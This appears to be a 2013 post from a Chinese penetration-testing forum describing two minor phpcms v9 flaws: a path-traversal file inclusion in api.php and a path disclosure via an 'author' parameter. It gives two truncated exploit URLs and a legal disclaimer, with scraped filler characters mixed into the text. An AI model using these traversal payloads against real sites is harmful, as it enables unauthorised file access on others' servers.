中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
+ x. T  Q% v, O3 h( ]6 a, w0 w% F/ |: o0 V! X* J! [3 V
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck- {/ z; D! d0 Y, B: K6 e

+ v% P2 v$ {& @#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。- }$ |& |3 X8 {2 ]8 A0 _! f
6 x+ f( {7 w2 _5 n5 z( ]8 t" [
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy+ u+ `$ Q# o  x  a
- a# X+ M6 u# U# E  b% `- Z1 y4 p
#暴路径
" r/ U1 D0 i  v' z3 H- ~7 H" A5 ?) U" ?, F" G# _
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。2 F) `" W, q" \$ v
1 S% O1 Z+ Y7 z. ~9 u. d3 m
0 Q" [; n- T  L" p- k1 J

# r- d5 w7 k  |+1




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2